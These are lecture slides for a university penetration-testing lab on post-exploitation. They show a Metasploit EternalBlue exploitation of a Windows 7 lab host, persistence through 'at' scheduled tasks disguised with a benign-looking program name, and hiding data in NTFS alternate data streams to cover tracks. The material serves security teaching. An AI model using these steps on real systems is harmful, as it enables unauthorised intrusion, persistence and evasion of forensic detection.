Performing Post-Exploitation

Techniques

CHAPTER 8 LAB 8

CSCB524/CCSB4113 1
 MAINTAINING PERSISTENCE
AFTER COMPROMISING A SYSTEM

CSCB524/CCSB4113 2
 Ways to Maintain Persistence of a
Compromised System
I. Creating and manipulating scheduled
jobs and tasks
II. Creating custom daemons and processes
III. Creating additional back doors
IV. Creating new users
V. Creating reverse and bind shells

CSCB524/CCSB4113 3
 Scheduled Tasks (at)
C:\at\\VICTIM 8:17pm /every:M,W,F User_Feed_Synchronization.exe

• Windows command-line program to

schedule tasks
– Looks like a benign program, update user
feed but maybe it is actually a reverse call
back to attacking platform to maintain that
persistence
• Task Scheduler is the GUI
version of the program

CSCB524/CCSB4113 4
 Kali VS Windows 7
10.0.2.37 10.0.2.38

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOST 10.0.2.38
msf exploit(ms17_010_eternalblue) > run
CSCB524/CCSB4113
Windows 7 IP Address
5
 Standard Shell Response, not meterpreter payload

C:\Windows\system32> time

Press ENTER

C:\Windows\system32> at 09:15 /every:Wednesday cmd /c “systeminfo > c:\info.txt”

C:\Windows\system32> at

CSCB524/CCSB4113 6
CSCB524/CCSB4113 7
CSCB524/CCSB4113 8
 • This shows the
capability of
being able to
run any
program we
want:
– Pinging back
– Password
sniffers
– Key loggers
CSCB524/CCSB4113 9
 COVERING TRACKS

CSCB524/CCSB4113 10
 Erase, Modify or Disable the
Evidence
• Remove any unneeded files or tools that
were added to the victim’s machine
• Hiding other files and resources in hidden or
uncommon locations
– Linux, Unix, OS X
• Create a folder beginning with a dot (.)
– Windows
• Hide stuff in the System32 or User folders
• Apply hidden attribute
• Use alternate Data Streams
C:\type c:\info.txt > hello.txt:info.txt
C:\start notepad hello.txt:info.txt

CSCB524/CCSB4113 11
 • Create a blank text file
C:\Windows\system32> cd \
C:\>type nul > hello.txt

• Check the file size

C:\>dir

• Hide info.txt inside the hello.txt

C:\>type c:\info.txt > hello.txt:info.txt

• Check the file size

C:\>dir

CSCB524/CCSB4113 12
 • Delete info.txt
C:\>del info.txt

• In Windows 7, open hello.txt

• In Windows 7, open cmd

C:\Users\Test>cd \
C:\>start notepad hello.txt:info.txt

CSCB524/CCSB4113 13
 Why is this useful to us?
• Instead of hiding text file, attacker could
be hiding malware and then they can call
that malware using the ‘at’ program
• No one can see the hidden file because of
alternate data stream

CSCB524/CCSB4113 14
 Alternate Data Streams (ADS)
• Alternate Data Streams (ADS) are a file
attribute only found on the NTFS file
system
• The ability to fork file data into existing
files without affecting their functionality,
size, or display to traditional file
browsing utilities like dir or Windows
Explorer

CSCB524/CCSB4113 15
 Department of Computing
College of Computing and Informatics
Universiti Tenaga Nasional

CSCB524/CCSB4113 16